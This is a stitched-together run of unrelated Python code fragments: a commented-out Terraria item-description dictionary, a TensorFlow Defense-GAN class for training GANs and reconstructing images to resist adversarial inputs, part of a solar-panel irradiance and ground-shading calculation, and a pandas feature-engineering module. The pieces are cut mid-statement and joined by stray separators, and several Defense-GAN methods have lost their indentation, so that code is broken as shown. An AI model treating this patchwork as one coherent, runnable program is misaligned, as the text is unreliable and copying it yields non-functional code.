# "Lead Chainmail": "",
# "Lead Greaves": "",
# "<NAME>": "",
# "<NAME>": "",
# "<NAME>": "",
# "Platinum Helmet": "",
# "Platinum Chainmail": "",
# "Platinum Greaves": "",
"Tin Ore": "tin ore can be found on or near the surface, in the cavern biome or underground and can be mined with any pickaxe.",
# "Lead Ore": "",
# "Tungsten Ore": "",
"Platinum Ore": "platinum ore can be found underground",
"Tin Bar": "A tin bar can be made using the furnace to smelt three tin ore",
# "Lead Bar": "",
# "Tungsten Bar": "",
"Platinum Bar": "A platinum bar can be made using the furnace to smelt four platinum ore.",
# "Tin Watch": "",
# "Tungsten Watch": "",
# "Platinum Watch": "",
# "Tin Chandelier": "",
# "Tungsten Chandelier": "",
# "Platinum Chandelier": "",
# "Platinum Candle": "",
# "Platinum Candelabra": "",
# "Platinum Crown": "",
# "Lead Anvil": "",
# "Tin Brick": "",
# "Tungsten Brick": "",
# "Platinum Brick": "",
# "Tin Brick Wall": "",
# "Tungsten Brick Wall": "",
# "Platinum Brick Wall": "",
# "Beam Sword": "",
# "Ice Blade": "",
# "Ice Bow": "",
# "Frost Staff": "",
# "Wood Helmet": "",
# "Wood Breastplate": "",
# "Wood | |
# Copyright 2018 The Defense-GAN Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
"""Contains the GAN implementations of the abstract model class."""
import cPickle
import os
import time
import numpy as np
import tensorflow as tf
from tensorflow.contrib import slim
import tflib
import tflib.cifar10
import tflib.mnist
import tflib.plot
import tflib.save_images
from datasets.utils import get_generators
from models.base_model import AbstractModel
from models.dataset_models import mnist_generator, celeba_discriminator, \
mnist_discriminator, celeba_generator
from utils.misc import ensure_dir
from utils.visualize import save_images_files
class DefenseGANBase(AbstractModel):
    def __init__(self, cfg=None, test_mode=False, verbose=True, **args):
        """Initializes the GAN base model with its default hyper-parameters.

        Args:
            cfg: Configuration object handed to AbstractModel; overrides
                the default attribute values listed below.
            test_mode: If True, the model is set up for test time only.
            verbose: If True, verbose information is printed.
            **args: Extra keyword overrides forwarded to AbstractModel.
        """
        # Names of the attributes that the config is allowed to override.
        default_attributes = ['dataset_name', 'batch_size', 'use_bn',
                              'test_batch_size',
                              'mode', 'gradient_penalty_lambda', 'train_iters',
                              'critic_iters', 'latent_dim', 'net_dim',
                              'input_transform_type',
                              'debug', 'rec_iters', 'image_dim', 'rec_rr',
                              'rec_lr', 'test_again', 'loss_type',
                              'attribute']
        self.dataset_name = None  # Name of the dataset.
        self.batch_size = 32  # Batch size for training the GAN.
        self.use_bn = True  # Use batchnorm in the discriminator and generator.
        self.test_batch_size = 20  # Batch size for test time.
        self.mode = 'gp-wgan'  # The mode of training the GAN (default: gp-wgan).
        # NOTE(review): `_loss` branches on 'wgan-gp', not 'gp-wgan' — confirm
        # which spelling the configs actually set.
        self.gradient_penalty_lambda = 10.0  # Gradient penalty scale.
        self.train_iters = 30000  # Number of training iterations.
        self.critic_iters = 5  # Critic iterations per training step.
        self.latent_dim = None  # The dimension of the latent vectors.
        self.net_dim = None  # The complexity of network per layer.
        self.input_transform_type = 0  # The normalization used for the inputs.
        self.debug = False  # Debug info will be printed.
        self.image_dim = [None, None, None]  # [height, width, number of channels] of the output image.
        self.rec_iters = 200  # Number of reconstruction iterations.
        self.rec_rr = 10  # Number of random restarts for the reconstruction.
        self.rec_lr = 10.0  # The reconstruction learning rate.
        self.test_again = False  # If true, do not use the cached info for test phase.
        self.attribute = 'gender'
        # Should be implemented in the child classes.
        self.discriminator_fn = None
        self.generator_fn = None
        self.train_data_gen = None
        self.model_save_name = 'GAN.model'
        # AbstractModel applies the cfg/args overrides and builds the graph,
        # so `self.mode` and `self.generator_vars` are set after this call.
        super(DefenseGANBase, self).__init__(default_attributes,
                                             test_mode=test_mode,
                                             verbose=verbose, cfg=cfg, **args)
        self.save_var_prefixes = ['Generator', 'Discriminator']
        # Saver restricted to the generator weights (plus encoder
        # parameters in 'enc' mode), used by `load_generator` below.
        if self.mode == 'enc':
            saver = tf.train.Saver(
                var_list=self.generator_vars + self.enc_params)
        else:
            saver = tf.train.Saver(var_list=self.generator_vars)
        self.load_generator = lambda ckpt_path=None: self.load(
            checkpoint_dir=ckpt_path, saver=saver)
        self._load_dataset()
    def _build_generator_discriminator(self):
        """Creates the generator and discriminator graph per dataset.

        No-op hook: dataset-specific subclasses override this to set
        `self.generator_fn` / `self.discriminator_fn` before `_build`
        uses them.
        """
        pass
    def _load_dataset(self):
        """Loads the dataset.

        No-op hook: dataset-specific subclasses override this to set up
        the data generators. Called at the end of `__init__`.
        """
        pass
    def _build(self):
        """Builds the computation graph.

        Creates the input placeholders, the generator/discriminator
        sub-graphs, collects their variables, and prepares a fixed-noise
        sampling op used for debugging/visualization.
        """
        # The reconstruction uses `rec_rr` random restarts per image, so
        # the batch must split evenly among them.
        assert (self.batch_size % self.rec_rr) == 0, 'Batch size ' \
                                                     'should be ' \
                                                     'divisable by ' \
                                                     'random restart'
        self.test_batch_size = self.batch_size
        # Defining batch_size in input placeholders is inevitable at least
        # for now, because the z vectors are Tensorflow variables.
        self.real_data_pl = tf.placeholder(
            tf.float32, shape=[self.batch_size] + self.image_dim,
        )
        self.real_data_test_pl = tf.placeholder(
            tf.float32, shape=[self.test_batch_size] + self.image_dim,
        )
        self.input_pl_transform()
        # Generator / discriminator graphs are provided by the subclass.
        self._build_generator_discriminator()
        self.fake_data = self.generator_fn()
        self.disc_real = self.discriminator_fn(self.real_data)
        # Reuse the discriminator variables for the fake branch so both
        # branches share the same weights.
        with tf.variable_scope(tf.get_variable_scope(), reuse=True):
            sc = tf.get_variable_scope()
            sc.reuse_variables()
            self.disc_fake = self.discriminator_fn(self.fake_data)
        self.generator_vars = slim.get_variables('Generator')
        self.discriminator_vars = slim.get_variables('Discriminator')
        # Fixed noise so the debug sample grids are comparable across
        # training iterations.
        self.fixed_noise = tf.constant(
            np.random.normal(size=(128, self.latent_dim)).astype(
                'float32'))
        self.fixed_noise_samples = self.generator_fn(self.fixed_noise,
                                                     is_training=False)
def _loss(self):
"""Builds the loss part of the graph.."""
self.discriminator_cost = 0
self.generator_cost = 0
if self.mode == 'wgan':
self.generator_cost = -tf.reduce_mean(self.disc_fake)
self.discriminator_cost = tf.reduce_mean(
self.disc_fake) - tf.reduce_mean(
self.disc_real)
self.gen_train_op = tf.train.RMSPropOptimizer(
learning_rate=5e-5
).minimize(self.generator_cost, var_list=self.generator_vars)
self.disc_train_op = tf.train.RMSPropOptimizer(
learning_rate=5e-5
).minimize(self.discriminator_cost,
var_list=self.discriminator_vars)
clip_ops = []
for var in tflib.params_with_name('Discriminator'):
clip_bounds = [-.01, .01]
clip_ops.append(
tf.assign(
var,
tf.clip_by_value(var, clip_bounds[0], clip_bounds[1])
)
)
self.clip_disc_weights = tf.group(*clip_ops)
elif self.mode == 'wgan-gp':
self.generator_cost = -tf.reduce_mean(self.disc_fake)
disc_cost = tf.reduce_mean(self.disc_fake) - tf.reduce_mean(
self.disc_real)
alpha = tf.random_uniform(
shape=[self.batch_size, 1, 1, 1],
minval=0.,
maxval=1.
)
differences = self.fake_data - self.real_data
interpolates = self.real_data + (alpha * differences)
gradients = \
tf.gradients(self.discriminator_fn(interpolates),
[interpolates])[0]
slopes = tf.sqrt(
tf.reduce_sum(tf.square(gradients), reduction_indices=[1]))
gradient_penalty = tf.reduce_mean((slopes - 1.) ** 2)
self.discriminator_cost = disc_cost + \
self.gradient_penalty_lambda * \
gradient_penalty
self.gen_train_op = tf.train.AdamOptimizer(
learning_rate=1e-4,
beta1=0.5,
beta2=0.9
).minimize(self.generator_cost, var_list=self.generator_vars)
self.disc_train_op = tf.train.AdamOptimizer(
learning_rate=1e-4,
beta1=0.5,
beta2=0.9
).minimize(self.discriminator_cost,
var_list=self.discriminator_vars)
self.clip_disc_weights = None
elif self.mode == 'dcgan':
self.generator_cost = tf.reduce_mean(
tf.nn.sigmoid_cross_entropy_with_logits(
self.disc_fake,
tf.ones_like(self.disc_fake)
))
disc_cost = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(
self.disc_fake,
tf.zeros_like(self.disc_fake)
))
disc_cost += tf.reduce_mean(
tf.nn.sigmoid_cross_entropy_with_logits(
self.disc_real,
tf.ones_like(self.disc_real)
))
self.discriminator_cost = disc_cost / 2.
self.gen_train_op = tf.train.AdamOptimizer(
learning_rate=2e-4,
beta1=0.5
).minimize(self.generator_cost, var_list=self.generator_vars)
self.disc_train_op = tf.train.AdamOptimizer(
learning_rate=2e-4,
beta1=0.5
).minimize(disc_cost, var_list=self.discriminator_vars)
self.clip_disc_weights = None
def _generate_image(self, training_iter):
    """Sample images from the fixed noise vector and save them to disk.

    The samples are written into the `debug` directory that mirrors the
    checkpoint directory layout.

    Args:
        training_iter: Training iteration number, embedded in the
            output filename.
    """
    generated = self.sess.run(self.fixed_noise_samples)
    debug_dir = self.checkpoint_dir.replace('output', 'debug')
    out_path = os.path.join(debug_dir,
                            'samples_{}.png'.format(training_iter))
    tflib.save_images.save_images(generated.reshape((128, 28, 28)), out_path)
def _inf_train_gen(self):
"""A generator function for input training data."""
while True:
for images, targets in self.train_data_gen():
yield images
def train(self, phase=None):
    """Trains the GAN model.

    Runs the alternating generator/discriminator update loop, resuming
    from an existing checkpoint when available, logging costs, doing a
    periodic dev-set evaluation, and checkpointing every 500 iterations.

    NOTE: this method uses Python 2 constructs (`xrange`, `gen.next()`).

    Args:
        phase: When not None, the generator update is skipped each
            iteration and only the discriminator/critic is trained.
            NOTE(review): exact intended semantics of `phase` not
            visible here — confirm against callers.
    """
    sess = self.sess
    self.initialize_uninitialized()
    gen = self._inf_train_gen()
    # Resume from an existing checkpoint when one is available.
    could_load = self.load(checkpoint_dir=self.checkpoint_dir,
                           prefixes=self.save_var_prefixes)
    if could_load:
        print('[*] Model loaded.')
    else:
        print('[#] No model found')
    cur_iter = self.sess.run(self.global_step)
    max_train_iters = self.train_iters
    step_inc = self.global_step_inc
    global_step = self.global_step
    ckpt_dir = self.checkpoint_dir
    for iteration in xrange(cur_iter, max_train_iters):
        start_time = time.time()
        # One generator step per iteration (skipped on the very first
        # iteration and whenever a training phase is specified).
        if iteration > 0 and 'gan' in self.mode and phase is None:
            _ = sess.run(self.gen_train_op,
                         feed_dict={self.is_training: 1})
        # DCGAN takes one discriminator step per generator step; the
        # WGAN variants take `critic_iters` critic steps instead.
        if self.mode == 'dcgan':
            disc_iters = 1
        else:
            disc_iters = self.critic_iters
        for i in xrange(disc_iters):
            _data = gen.next()
            _disc_cost, _ = sess.run(
                [self.discriminator_cost, self.disc_train_op],
                feed_dict={self.real_data_pl: _data,
                           self.is_training: 1}
            )
            # Weight clipping is only configured for plain WGAN mode.
            if self.clip_disc_weights is not None:
                _ = sess.run(self.clip_disc_weights)
        tflib.plot.plot('{}/train disc cost'.format(self.debug_dir),
                        _disc_cost)
        tflib.plot.plot('{}/time'.format(self.debug_dir),
                        time.time() - start_time)
        # Calculate dev loss and generate samples every 100 iters.
        if iteration % 100 == 5:
            dev_disc_costs = []
            dev_ctr = 0
            # Evaluate on at most 20 dev batches.
            for images, _ in self.dev_gen():
                dev_ctr += 1
                if dev_ctr > 20:
                    break
                _dev_disc_cost = sess.run(
                    self.discriminator_cost,
                    feed_dict={self.real_data_pl: images,
                               self.is_training: 0}
                )
                dev_disc_costs.append(_dev_disc_cost)
            tflib.plot.plot('{}/dev disc cost'.format(self.debug_dir),
                            np.mean(dev_disc_costs))
            # NOTE(review): `generate_image` (no underscore) is called,
            # while `_generate_image` is what's defined above —
            # presumably a public wrapper exists elsewhere; confirm.
            self.generate_image(iteration)
        # Write logs every 100 iters
        if (iteration < 5) or (iteration % 100 == 99):
            tflib.plot.flush()
        self.sess.run(step_inc)
        # Persist a checkpoint every 500 iterations.
        if iteration % 500 == 499:
            self.save(checkpoint_dir=ckpt_dir, global_step=global_step)
        tflib.plot.tick()
    # Final checkpoint after the loop completes.
    self.save(checkpoint_dir=ckpt_dir, global_step=global_step)
    self.close_session()
def reconstruct(
        self, images, batch_size=None, back_prop=True,
        reconstructor_id=0, z_init_val=None):
    """Creates the reconstruction op for Defense-GAN.

    Searches, by gradient descent on latent codes, for the generator
    output closest (mean squared error) to each input image, running
    `self.rec_rr` random restarts in parallel and keeping the best one.

    Args:
        images: Input tensor of images to reconstruct.
        batch_size: Static batch size; defaults to `self.test_batch_size`.
        back_prop: Whether gradients may flow through the while-loop.
        reconstructor_id: Suffix used to disambiguate the variables when
            several reconstructors are built in the same graph.
        z_init_val: Optional tensor used to initialize the latent codes.

    Returns:
        The `tf.Tensor` of the reconstructed input, shaped like `images`
        with the leading dimension set to `batch_size`.
    """
    # Batch size is needed because the latent codes are `tf.Variable`s and
    # need to be built into TF's static graph beforehand.
    batch_size = batch_size if batch_size else self.test_batch_size
    x_shape = images.get_shape().as_list()
    x_shape[0] = batch_size
    # Repeat images self.rec_rr times to handle random restarts in
    # parallel.
    images_tiled_rr = tf.reshape(
        images, [x_shape[0], np.prod(x_shape[1:])])
    images_tiled_rr = tf.tile(images_tiled_rr, [1, self.rec_rr])
    images_tiled_rr = tf.reshape(
        images_tiled_rr, [x_shape[0] * self.rec_rr] + x_shape[1:])
    with tf.variable_scope(tf.get_variable_scope(), reuse=tf.AUTO_REUSE):
        # Number of reconstruction iterations; kept in the LOCAL_VARIABLES
        # collection so `tf.local_variables_initializer()` resets it.
        rec_iter_const = tf.get_variable(
            'rec_iter_{}'.format(reconstructor_id),
            initializer=tf.constant(0),
            trainable=False, dtype=tf.int32,
            collections=[tf.GraphKeys.LOCAL_VARIABLES],
        )
        # The latent variables (rec_rr restarts per image).
        z_hat = tf.get_variable(
            'z_hat_rec_{}'.format(reconstructor_id),
            shape=[batch_size * self.rec_rr, self.latent_dim],
            dtype=tf.float32,
            initializer=tf.random_normal_initializer(
                stddev=np.sqrt(1.0 / self.latent_dim)),
            collections=[tf.GraphKeys.LOCAL_VARIABLES]
        )
    # Learning rate for reconstruction, decayed 10x at 80% of the
    # iteration budget.
    rec_lr_op_from_const = self.get_learning_rate(init_lr=self.rec_lr,
                                                  global_step=rec_iter_const,
                                                  decay_mult=0.1,
                                                  decay_iter=np.ceil(
                                                      self.rec_iters *
                                                      0.8).astype(
                                                      np.int32))
    # The optimizer.
    rec_online_optimizer = tf.train.MomentumOptimizer(
        learning_rate=rec_lr_op_from_const, momentum=0.7,
        name='rec_optimizer')
    init_z = tf.no_op()
    if z_init_val is not None:
        init_z = tf.assign(z_hat, z_init_val)
    z_hats_recs = self.generator_fn(z_hat, is_training=False)
    num_dim = len(z_hats_recs.get_shape())
    # Average the squared error over all non-batch dimensions.
    axes = range(1, num_dim)
    image_rec_loss = tf.reduce_mean(
        tf.square(z_hats_recs - images_tiled_rr),
        axis=axes)
    rec_loss = tf.reduce_sum(image_rec_loss)
    # Build the optimizer slot variables up-front so they exist when we
    # add them to the local-variables collection below.
    rec_online_optimizer.minimize(rec_loss, var_list=[z_hat])

    def rec_body(i, *args):
        # One gradient-descent step on the latent codes.
        z_hats_recs = self.generator_fn(z_hat, is_training=False)
        image_rec_loss = tf.reduce_mean(
            tf.square(z_hats_recs - images_tiled_rr),
            axis=axes)
        rec_loss = tf.reduce_sum(image_rec_loss)
        train_op = rec_online_optimizer.minimize(rec_loss,
                                                 var_list=[z_hat])
        # tf.tuple forces the train op to run before values are returned.
        return tf.tuple(
            [tf.add(i, 1), rec_loss, image_rec_loss, z_hats_recs],
            control_inputs=[train_op])

    rec_iter_condition = lambda i, *args: tf.less(i, self.rec_iters)
    # Make the optimizer slots local so they reset with the latent codes.
    for opt_var in rec_online_optimizer.variables():
        tf.add_to_collection(
            tf.GraphKeys.LOCAL_VARIABLES,
            opt_var,
        )
    with tf.control_dependencies([init_z]):
        online_rec_iter, online_rec_loss, online_image_rec_loss, \
            all_z_recs = tf.while_loop(
                rec_iter_condition,
                rec_body,
                [rec_iter_const, rec_loss, image_rec_loss, z_hats_recs]
                , parallel_iterations=1, back_prop=back_prop,
                swap_memory=False)
    # For each input image keep the random restart with the lowest
    # reconstruction loss.
    final_recs = []
    for i in range(batch_size):
        ind = i * self.rec_rr + tf.argmin(
            online_image_rec_loss[
                i * self.rec_rr:(i + 1) * self.rec_rr
            ],
            axis=0)
        final_recs.append(all_z_recs[tf.cast(ind, tf.int32)])
    online_rec = tf.stack(final_recs)
    return tf.reshape(online_rec, x_shape)
def reconstruct_dataset(self, ckpt_path=None, max_num=-1, max_num_load=-1):
"""Reconstructs the images of the config's dataset with the generator.
"""
if not self.initialized:
self.load_generator(ckpt_path=ckpt_path)
splits = ['train', 'dev', 'test']
rec = self.reconstruct(self.real_data_test)
self.sess.run(tf.local_variables_initializer())
rets = {}
for split in splits:
if max_num > 0:
output_dir = os.path.join(self.checkpoint_dir,
'recs_rr{:d}_lr{:.5f}_'
'iters{:d}_num{:d}'.format(
self.rec_rr, self.rec_lr,
self.rec_iters, max_num),
split)
else:
output_dir = | |
index1):
actualGroundGHI += frontGroundGHI[k] * (k + 1.0 - projectedX1);
elif (k == index2):
if (k < 100):
actualGroundGHI += frontGroundGHI[k] * (projectedX2 - k);
else:
actualGroundGHI += frontGroundGHI[k - 100] * (projectedX2 - k);
else:
if (k < 100):
actualGroundGHI += frontGroundGHI[k];
else:
actualGroundGHI += frontGroundGHI[k - 100];
actualGroundGHI /= projectedX2 - projectedX1; # Irradiance on ground in the 1 degree field of view
#if (i == 0)
# Console.WriteLine("j=0 index1=1 index2=2 projectX1=3,5:0.0 projectX2=4,5:0.0 actualGrdGHI=5,6:0.0", j, index1, index2, projectedX1, projectedX2, actualGroundGHI);
frontGTI[i] += 0.5 * (math.cos(j * DTOR) - math.cos((j + 1) * DTOR)) * SegAOIcor[index][j] * actualGroundGHI * albedo; # Add ground reflected component
frontReflected[i] += 0.5 * (math.cos(j * DTOR) - math.cos((j + 1) * DTOR)) * actualGroundGHI * albedo * (1.0 - SegAOIcor[index][j] * (1.0 - Ro)); # Reflected ground radiation from module
#Console.WriteLine("actualGroundGHI = 0,6:0.0 inputGHI = 1,6:0.0 aveArrayGroundGHI = 2,6:0.0", actualGroundGHI, dhi + dni * math.cos(zen), aveGroundGHI);
# End of j loop for adding ground reflected componenet
# Calculate and add direct and circumsolar irradiance components
inc, tiltr, sazmr = sunIncident(0, beta / DTOR, sazm / DTOR, 45.0, zen, azm) # For calling PerezComp to break diffuse into components for 90 degree tilt (vertical)
# print "sunIncident 2."
# print "inc = ", inc
# print "tiltr = ", tiltr
# print "sazmr = ", sazmr
# print " INCIDENT REALY NEEDED for AOI ", inc
gtiAllpc, iso_dif, circ_dif, horiz_dif, grd_dif, beam = perezComp(dni, dhi, albedo, inc, tiltr, zen) # Call to get components for the tilt
# print "PEREZCOMP 2 = "
# print "gtiAllpc = ", vti
# print "iso_dif = ", iso_dif
# print "circ_dif = ", circ_dif
# print "horiz_dif = ", horiz_dif
# print "grd_dif = ", grd_dif
# print "beam = ", beam
cellShade = pvFrontSH * cellRows - i;
if (cellShade > 1.0): # Fully shaded if > 1, no shade if < 0, otherwise fractionally shaded
cellShade = 1.0;
elif (cellShade < 0.0):
cellShade = 0.0;
if (cellShade < 1.0 and inc < math.pi / 2.0): # Cell not shaded entirely and inc < 90 deg
cor = aOIcorrection(n2, inc); # Get AOI correction for beam and circumsolar
frontGTI[i] += (1.0 - cellShade) * (beam + circ_dif) * cor; # Add beam and circumsolar radiation
#frontReflected[i] += (1.0 - cellShade) * (beam + circ_dif) * (1.0 - cor * (1.0 - Ro)); # Reflected beam and circumsolar radiation from module
# End of for i = 0; i < cellRows loop
return aveGroundGHI, frontGTI, frontReflected;
# End of GetFrontSurfaceIrradiances
def getGroundShadeFactors(rowType, beta, C, D, elv, azm, sazm):
"""
This method determines if the ground is shaded from direct beam radiation
for points on the ground from the leading edge of one row of PV panels to
the leading edge of the next row of PV panels behind it. This row-to-row
dimension is divided into 100 ground segments and a ground shade factor is
returned for each ground segment, with values of 1 for shaded segments and
values of 0 for non shaded segments. The fractional amounts of shading of
the front and back surfaces of the PV panel are also returned. 8/20/2015
4/18/2016 - Modified to account for different row types. Because the ground
factors may now be different depending on row, they are calculated for the
row-to-row dimension to the rear of the leading module edge and to the
front of the leading edge. Also returned is the maximum shadow length
projected to the front or rear from the front of the module row
Parameters
----------
rowType : str
"first", "interior", "last", or "single"
beta
Tilt from horizontal of the PV modules/panels (deg)
C
Ground clearance of PV panel (in PV panel slope lengths)
D
Horizontal distance between rows of PV panels (in PV panel slope
lengths)
elv
Sun elevation (in radians)
azm
Sun azimuth (in radians)
sazm
Surface azimuth of PV panels (deg)
Returns
-------
pvFrontSH : numeric
Decimal fraction of the front surface of the PV panel that is shaded,
0.0 to 1.0
pvBackSH : numeric
Decimal fraction of the back surface of the PV panel that is shaded,
0.0 to 1.0
rearGroundSH : array of size [100]
Ground shade factors for ground segments to the rear, 0 = not shaded,
1 = shaded
frontGroundSH : array of size [100]
Ground shade factors for ground segments to the front, 0 = not shaded,
1 = shaded
maxShadow : numeric
Maximum shadow length projected to the front(-) or rear (+) from the
front of the module row (in PV panel slope lengths), only used later
for rowTypes other than "interior"
"""
rearGroundSH = []
frontGroundSH = []
beta = beta * DTOR # Tilt from horizontal of the PV modules/panels, in radians
sazm = sazm * DTOR # Surface azimuth of PV module/pamels, in radians
h = math.sin(beta); # Vertical height of sloped PV panel (in PV panel slope lengths)
x1 = math.cos(beta); # Horizontal distance from front of panel to rear of panel (in PV panel slope lengths)
rtr = D + x1; # Row-to-row distance (in PV panel slope lengths)
# Divide the row-to-row spacing into 100 intervals for calculating ground shade factors
delta = rtr / 100.0;
x = -delta / 2.0; # Initialize horizontal dimension x to provide midpoof intervals
Lh = (h / math.tan(elv)) * math.cos(sazm - azm); # Horizontal length of shadow perpindicular to row from top of module to bottom of module
Lhc = ((h + C) / math.tan(elv)) * math.cos(sazm - azm); # Horizontal length of shadow perpindicular to row from top of module to ground level
Lc = (C / math.tan(elv)) * math.cos(sazm - azm); # Horizontal length of shadow perpindicular to row from bottom of module to ground level
ss1 = 0.0; se1 = 0.0; ss2 = 0.0; se2 = 0.0; # Initialize shading start (s) and end (e) to zeros for two potential shading segments
pvFrontSH = 0.0;
pvBackSH = 0.0;
if (rowType == "interior"):
if (Lh > D): # Front side of PV module partially shaded, back completely shaded, ground completely shaded
pvFrontSH = (Lh - D) / (Lh + x1);
pvBackSH = 1.0;
ss1 = 0.0; # Ground shaded from 0.0 to rtr
se1 = rtr;
elif (Lh < -(rtr + x1)): # Back side of PV module partially shaded, front completely shaded, ground completely shaded
pvFrontSH = 1.0;
pvBackSH = (Lh + rtr + x1) / (Lh + x1);
ss1 = 0.0; # Ground shaded from 0.0 to rtr
se1 = rtr;
else: # Ground is partially shaded (I assume)
if (Lhc >= 0.0): # Shadow to rear of row, module front unshaded, back shaded
pvFrontSH = 0.0;
pvBackSH = 1.0;
Ss = Lc; # Shadow starts at Lc
Se = Lhc + x1; # Shadow ends here
while (Ss > rtr):
Ss -= rtr; # Put shadow in correct rtr space if needed
Se -= rtr;
ss1 = Ss;
se1 = Se;
if (se1 > rtr): # then need to use two shade areas
se1 = rtr;
ss2 = 0.0;
se2 = Se - rtr;
if (se2 > ss1):
# This would mean ground completely shaded, does this occur?
ss1 = 0.0; # Ground shaded from 0.0 to rtr
se1 = rtr;
else: # Shadow to front of row, either front or back might be shaded, depending on tilt and other factors
Ss = 0.0; # Shadow starts at Lc, initialize
Se = 0.0; # Shadow ends here, initialize
if (Lc < Lhc + x1):
pvFrontSH = | |
# !/usr/bin/python
# -*- coding: utf-8 -*-
"""
This script is designed to store some kind of feature engineering methods.
"""
# Import necessary libraries.
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import scipy
import warnings
import logging
from scipy.stats import kstest
from scipy.stats import shapiro
import scipy.stats as spstats
from sklearn.preprocessing import *
import data_clean as dc
from config import output_log
from util import PowerTransformer
warnings.filterwarnings('ignore')
# Create logger for debugging.
output_log.init_log('./log/crawl_html')
class CategoryCombiner(object):
    """Combine rare categories of selected columns into one 'Others' bucket.

    Categories whose relative frequency in the training data falls below
    ``discard_ratio`` are replaced with the literal value ``'Others'``.
    The discarded categories are remembered per column so the identical
    replacement can be replayed on test data via :meth:`transform`.
    """

    def __init__(self, cate_columns, discard_ratio=0.01):
        """Initialize class with given parameters.

        :param cate_columns: List. The list of category columns, which
            would be processed.
        :param discard_ratio: Float. Frequency threshold below which a
            category is folded into 'Others'.
        """
        self.cate_columns = cate_columns
        self.discard_ratio = discard_ratio
        # Per-column list of the categories folded into 'Others'.
        self.discard_cate_dic = {}

    def fit_transform(self, data):
        """Learn the rare categories on train data and replace them.

        :param data: Dataframe. The Pandas dataframe to be processed
            (the column is replaced in place, as before).
        :return: Dataframe. The result dataframe after processing.
        """
        for column in self.cate_columns:
            # PERF FIX: compute the value counts once per column; the
            # original re-ran `value_counts()` for every distinct value,
            # i.e. O(k) full passes over the column.
            counts = data[column].value_counts()
            total_num = float(counts.sum())
            discard_cate = [key for key in counts.keys()
                            if counts[key] / total_num < self.discard_ratio]
            data[column] = data[column].replace(discard_cate, 'Others')
            # Remember the discarded categories for transform().
            self.discard_cate_dic[column] = discard_cate
        return data

    def transform(self, data):
        """Apply the replacement learned in fit_transform() to new data.

        :param data: Dataframe. The Pandas dataframe to be transformed.
        :return: Dataframe. The dataframe after transforming.
        """
        for column in self.cate_columns:
            discard_cate = self.discard_cate_dic[column]
            data[column] = data[column].replace(discard_cate, 'Others')
        return data
class CategoryFeatureEngineer(object):
    """Apply category feature engineering automatically.

    Pipeline: fill missing values, fold rare categories into 'Others',
    label-encode, then one-hot encode each category column. Every fitted
    converter is stored on the instance so the identical pipeline can be
    replayed on test data with :meth:`transform`.
    """

    def __init__(self, cate_columns):
        """Initialize class with given parameters.

        :param cate_columns: List. The list consists of category column names.
        """
        self.cate_columns = cate_columns
        # One-hot encoder fitted per column.
        self.cate_encoding_dic = {}
        # Rare-category combiner fitted on train data.
        self.cate_combiner = None
        # Label encoder fitted per column.
        self.cate_label_dic = {}
        # NA filler fitted on train data.
        self.cate_na_filler = None

    def fit_transform(self, dataset):
        """Feature engineering for category columns.

        Conduct feature engineering to category columns.
        Including several kind of methods, as followings:
        1. Fill NA with 'missing'.
        2. Combine small categories into one same category.
        3. One-hot encoding for category columns.

        :param dataset: Dataframe. The input dataframe.
        :return: Dataframe. The output dataframe with converted category columns.
        """
        # Fill None with 'missing' for category columns.
        data = dataset.copy()
        na_filler = dc.NaFiller()
        data = na_filler.fit_transform(data, self.cate_columns)
        self.cate_na_filler = na_filler
        # Combine categories whose ratio are under 0.01 into one 'Others' category.
        cate_combiner = CategoryCombiner(self.cate_columns)
        data = cate_combiner.fit_transform(data)
        self.cate_combiner = cate_combiner
        # Label encoder to convert values in category column into numeric values.
        result = pd.DataFrame()
        for column in self.cate_columns:
            gen_le = LabelEncoder()
            result[column] = gen_le.fit_transform(data[column])
            # Store label encoder into dictionary.
            self.cate_label_dic[column] = gen_le
            # Encode category columns with One-hot Encoding method.
            gen_ohe = OneHotEncoder()
            gen_ohe.fit(result[[column]])
            gen_feature_arr = gen_ohe.transform(result[[column]]).toarray()
            gen_feature_labels = [column + '_' + str(cls_label)
                                  for cls_label in gen_le.classes_]
            gen_features = pd.DataFrame(gen_feature_arr,
                                        columns=gen_feature_labels)
            result = pd.concat([result, gen_features], axis=1)
            # Store encoders into dictionary.
            self.cate_encoding_dic[column] = gen_ohe
        # Reset the index so positional concatenation below lines up.
        data = data.reset_index()
        # Add other columns into result.
        for column in data.columns:
            if column not in self.cate_columns and column != 'index':
                result = pd.concat([result, data[column]], axis=1)
        return result

    def transform(self, data):
        """The feature engineering for category columns.

        Applies exactly the pipeline fitted in fit_transform() to test
        data, using the converters stored on the instance.

        :param data: Dataframe. The input Pandas dataframe, to be processed.
        :return: Dataframe. The processed dataframe.
        """
        # Fill None with 'missing' for category columns.
        data = self.cate_na_filler.transform(data, self.cate_columns)
        # BUG FIX: use the combiner fitted in fit_transform(); the
        # original referenced an undefined local name `cate_combiner`,
        # which raised NameError.
        data = self.cate_combiner.transform(data)
        for column in self.cate_columns:
            # BUG FIX: look up the per-column encoders stored during
            # fit_transform(); `gen_le` and `gen_ohe` were undefined
            # locals in the original.
            gen_le = self.cate_label_dic[column]
            gen_ohe = self.cate_encoding_dic[column]
            # Apply label encoder to transform category columns.
            data[column] = gen_le.transform(data[column])
            # Encode category columns with One-hot Encoding method.
            gen_feature_arr = gen_ohe.transform(data[[column]]).toarray()
            gen_feature_labels = [column + '_' + str(cls_label)
                                  for cls_label in gen_le.classes_]
            gen_features = pd.DataFrame(gen_feature_arr,
                                        columns=gen_feature_labels)
            data = pd.concat([data, gen_features], axis=1)
        return data
def column_type_detection(data, id_col, target_col):
    """Detect column type and collect according to column type.

    Splits the dataframe's columns into numeric and category groups,
    skipping the ID and target columns. Any remaining column whose dtype
    is neither float nor int is treated as categorical and is cast to
    the 'object' dtype in place.

    :param data: Dataframe. The input dataframe in pandas form.
    :param id_col: List. The list of ID column names.
    :param target_col: List. The list of Target column names.
    :return: List. Numeric_col, Category_col.
    """
    cate_columns = []
    num_columns = []
    skip_columns = set(id_col) | set(target_col)
    for key, col_dtype in data.dtypes.items():
        # Skip id and target columns.
        if key in skip_columns:
            continue
        if col_dtype in ['float', 'int']:
